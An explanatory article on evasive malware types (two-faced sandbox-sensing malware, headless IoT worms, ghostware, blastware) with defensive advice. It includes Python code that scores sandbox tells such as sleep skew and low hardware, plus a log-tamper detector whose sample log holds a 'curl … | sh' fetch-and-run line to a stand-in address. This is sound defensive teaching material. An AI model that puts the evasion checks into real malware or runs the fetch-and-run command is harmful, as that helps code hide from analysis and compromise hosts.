New malware infections are finding smarter ways to cover their tracks.
As a result, when a breach occurs, it is becoming harder for businesses and investigators to pinpoint what data was compromised, how it was stolen, and by whom.
Malware authors have also begun shipping programs that can deceive, erase, or even destroy the systems that flag them as malicious.
Below, we review some of these new malware types: two-faced malware, headless worms, ghostware, and blastware.
Two-faced malware gets its name from the way it presents one harmless "face" to the anti-virus and reveals its malicious "face" only after it has been judged safe.
This type of malware works by recognizing when an anti-virus or threat-protection product has isolated it in a sandbox for analysis.
A sandbox is a designated "safe zone", typically an instrumented virtual machine, used to run and observe questionable programs before they are given access to a computer's disk and network.
Two-faced malware senses that it is running in a sandbox (for example, by checking for unrealistically small hardware, a very short uptime, or a sleep call that returns faster than the wall clock should allow) and evades detection by ceasing all malicious activity while isolated.
Having observed nothing suspicious, the anti-virus flags the program as safe and releases it onto the real machine.
Once the malware has passed the sandbox, many security systems never look at it again because it has already been classified as safe; the sandbox verdict should therefore be treated as one signal, and behaviour should keep being monitored after release.
An updated strain of the Locky ransomware has shown detection-evasion behaviour similar to two-faced malware.
This version of Locky uses a mathematical calculation to determine whether it is running in a sandbox, and withholds its payload when it decides that it is.
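To make the sandbox-sensing behaviour concrete, here is an added Python illustration (it is not code from the original article, nor from Locky or any other family mentioned here) of the kind of environment checks such malware performs. It scores a handful of well-known sandbox tells, including a sleep-skew check: the sample asks for a long sleep and compares how much monotonic time actually passed, because many sandboxes fast-forward sleeps to shorten analysis. The thresholds, the two host-fact dictionaries and the FakeClock are constructed for the example. The defensive use is the mirror image: run the same checks inside your own sandbox and remove any tell it exhibits.

```python
import time

# Illustrative thresholds (assumptions for this example, not values taken
# from any specific sample): a real workstation normally exceeds all of them.
MIN_CPUS = 2
MIN_RAM_GB = 4
MIN_UPTIME_MIN = 30
MAX_SLEEP_SKEW = 0.25          # tolerated |elapsed - requested| / requested
SUSPICIOUS_USERNAMES = {"sandbox", "malware", "virus", "analyst", "test"}
ANALYSIS_PROCESSES = {"wireshark.exe", "procmon.exe", "ollydbg.exe", "x64dbg.exe"}


def sleep_skew(requested_seconds, sleep_fn=time.sleep, clock=time.monotonic):
    """Relative difference between the requested and the observed sleep time.

    A sandbox that fast-forwards sleep() to save analysis time yields a large
    negative skew; on a real host the value is close to zero.
    """
    start = clock()
    sleep_fn(requested_seconds)
    elapsed = clock() - start
    return (elapsed - requested_seconds) / requested_seconds


def sandbox_tells(facts, skew):
    """List the sandbox indicators present in `facts` (a dict of host
    properties) together with the sleep-skew measurement `skew`."""
    tells = []
    if facts["cpus"] < MIN_CPUS:
        tells.append("few_cpus")
    if facts["ram_gb"] < MIN_RAM_GB:
        tells.append("little_ram")
    if facts["uptime_min"] < MIN_UPTIME_MIN:
        tells.append("short_uptime")
    if facts["username"].lower() in SUSPICIOUS_USERNAMES:
        tells.append("analysis_username")
    if ANALYSIS_PROCESSES & {p.lower() for p in facts["processes"]}:
        tells.append("analysis_tools_running")
    if abs(skew) > MAX_SLEEP_SKEW:
        tells.append("sleep_skew")
    return tells


def looks_like_sandbox(facts, skew, threshold=2):
    """Two-faced malware would stay dormant whenever this returns True."""
    return len(sandbox_tells(facts, skew)) >= threshold


class FakeClock:
    """Constructed stand-in for a sandbox clock that fast-forwards sleeps.

    With acceleration=10 a requested 10 s sleep advances monotonic time by
    only 1 s; acceleration=1 behaves like a real host.
    """

    def __init__(self, acceleration=1.0):
        self.now = 0.0
        self.acceleration = acceleration

    def sleep(self, seconds):
        self.now += seconds / self.acceleration

    def monotonic(self):
        return self.now


# Constructed host profiles for the demonstration.
SANDBOX_HOST = {"cpus": 1, "ram_gb": 1, "uptime_min": 3,
                "username": "sandbox", "processes": ["explorer.exe", "procmon.exe"]}
REAL_HOST = {"cpus": 8, "ram_gb": 16, "uptime_min": 5400,
             "username": "alice", "processes": ["explorer.exe", "outlook.exe"]}


if __name__ == "__main__":
    fast = FakeClock(acceleration=10.0)
    honest = FakeClock(acceleration=1.0)
    sandbox_skew = sleep_skew(10, fast.sleep, fast.monotonic)    # -0.9
    real_skew = sleep_skew(10, honest.sleep, honest.monotonic)   # 0.0
    print("sandbox tells:", sandbox_tells(SANDBOX_HOST, sandbox_skew))
    print("real host tells:", sandbox_tells(REAL_HOST, real_skew))
    print("dormant in sandbox?", looks_like_sandbox(SANDBOX_HOST, sandbox_skew))
    print("dormant on real host?", looks_like_sandbox(REAL_HOST, real_skew))
```

The sleep-skew check is the one most sandboxes get wrong: if your analysis environment patches sleep to return immediately, the sample measures the difference and goes quiet, so it is better to let the clock run honestly and accept longer analysis times, or to advance every clock the guest can see consistently.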
Headless worms are an anticipated type of malware that targets "headless devices", gadgets that run without a screen, keyboard, or attending user.
Think of smart appliances, mobile trackers, and the other devices of the ever-growing Internet of Things.
IoT devices are notorious for connecting freely to the internet with little security, often with default credentials and no patching mechanism. This makes them easy prey for malware that seeks to add them to a botnet.
A botnet is a "zombie" network of malware-infected machines that an attacker controls without the owners' knowledge. Botnets are often used to power DDoS attacks.
A headless worm, which spreads from device to device on its own, could let attackers grow a botnet far more efficiently and launch even larger attacks, such as the massive one that recently targeted the DNS provider Dyn.
While a large-scale headless worm has yet to be discovered in the wild, the concept was demonstrated at the Black Hat Asia conference in May. It is only a matter of time before criminals put the idea to use.
Ghostware conceals its tracks by erasing all traces of its activity once a system has been breached.
This type of malware makes it especially difficult to work out what was compromised during a breach.
It also makes it hard for network security specialists to fix the weaknesses that led to the successful attack, since this type of malware leaves no trail pointing to its point of entry; that is why logs should be forwarded off-host to a collector the compromised machine cannot alter.
Ghostware appears to be a more sophisticated relative of rootkit malware, which merely hides its presence rather than erasing every indication of it.
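Because ghostware attacks the evidence itself, the practical defence is to keep a copy of the logs somewhere the compromised host cannot reach and to look for the holes that wiping leaves behind. The following Python example is added here and is not from the original article; it runs two such checks over constructed syslog-style lines. It flags unexpected gaps in a heartbeat that should appear every five minutes, and it reports lines that survive on a remote log collector but are missing from the host's local copy. The line format, the heartbeat cadence and the sample lines (including the host name and the TEST-NET address 203.0.113.7) are assumptions for the illustration.

```python
import re
from datetime import datetime, timedelta

# Assumed log format for the example: ISO timestamp, host, program, message.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<prog>[^:]+): (?P<msg>.*)$"
)

HEARTBEAT_INTERVAL = timedelta(minutes=5)   # assumed cadence of the monitored heartbeat


def parse(line):
    """Split one log line into its fields; raise on anything unparseable."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def heartbeat_gaps(lines, prog="heartbeat", interval=HEARTBEAT_INTERVAL,
                   slack=timedelta(seconds=30)):
    """Return (previous_ts, next_ts, missing_beats) wherever the heartbeat
    for `prog` skips more than one interval (plus `slack` for jitter)."""
    beats = sorted(r["ts"] for r in map(parse, lines) if r["prog"] == prog)
    gaps = []
    for prev, nxt in zip(beats, beats[1:]):
        delta = nxt - prev
        if delta > interval + slack:
            missing = round(delta / interval) - 1
            gaps.append((prev, nxt, missing))
    return gaps


def deleted_locally(local_lines, remote_lines):
    """Lines the remote collector received that no longer exist on the host.

    Forwarded syslog leaves the machine as each line is written, so anything
    present remotely but absent locally is evidence of deletion on the host."""
    local = set(local_lines)
    return [line for line in remote_lines if line not in local]


# Constructed sample: the collector's copy of web01's log. The sshd/sudo
# lines at 10:17-10:18 are the attacker's entry; everything between
# 10:17 and 10:25 was later wiped from the host's own log file.
REMOTE_LOG = [
    "2024-05-01T10:00:00 web01 heartbeat: ok",
    "2024-05-01T10:05:00 web01 heartbeat: ok",
    "2024-05-01T10:10:00 web01 heartbeat: ok",
    "2024-05-01T10:15:00 web01 heartbeat: ok",
    "2024-05-01T10:17:42 web01 sshd: Accepted password for deploy from 203.0.113.7 port 51022 ssh2",
    "2024-05-01T10:18:03 web01 sudo: deploy : TTY=pts/0 ; COMMAND=/bin/sh -c 'curl -s http://203.0.113.7/x | sh'",
    "2024-05-01T10:20:00 web01 heartbeat: ok",
    "2024-05-01T10:25:00 web01 heartbeat: ok",
    "2024-05-01T10:30:00 web01 heartbeat: ok",
    "2024-05-01T10:35:00 web01 heartbeat: ok",
]
LOCAL_LOG = REMOTE_LOG[:4] + REMOTE_LOG[8:]   # what survived on the host


if __name__ == "__main__":
    for prev, nxt, missing in heartbeat_gaps(LOCAL_LOG):
        print(f"gap: {prev} -> {nxt}, {missing} heartbeat(s) missing")
    for line in deleted_locally(LOCAL_LOG, REMOTE_LOG):
        print("deleted on host:", line)
```

The heartbeat check works even without a remote copy, because it only needs something that is known to log at a fixed cadence; the local-versus-remote comparison is stronger but depends on the forwarder having shipped each line before the wiper ran, which is the reason to forward in near real time rather than in hourly batches.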
Blastware, while not at all subtle, is very difficult to analyse after an attack. It earns its name by wiping the machines that detect it as malware.
When researchers attempted to inspect its code further, the malware erased both the traces of its activity and everything stored on the hard drive.
Such attacks can destroy crucial infrastructure in the network.
This also makes it incredibly difficult for investigators to find the culprit, because both the malware and the infected system are destroyed; suspicious samples should therefore be examined only on disposable, snapshotted virtual machines, with backups kept where the infected host cannot reach them.
As you can see, all of these types of malware are nasty and difficult to detect, so prevention is the best approach.
Good ways to keep these attacks from hurting your clients:
- Implement sound security policies, and consistently follow and enforce them. Update them continually to address evolving threats and needs.
- Educate employees to be cautious when opening emails or attachments from an unknown source.
- Segment the network on a need-to-access basis. Give users access only to the systems needed to perform their jobs; do not grant network-wide access to every user.
- Prevent unauthorized devices, IoT gadgets included, from connecting to the network.
- Maintain a firewall on the network perimeter and on all computers and devices.
- Maintain an antivirus solution and keep both its engine and its signatures up to date.
- Forward logs and backups to systems the endpoint cannot modify, so that ghostware or blastware on a host cannot erase the evidence or the recovery copy.
- Regularly patch and update all systems, and train employees to do the same.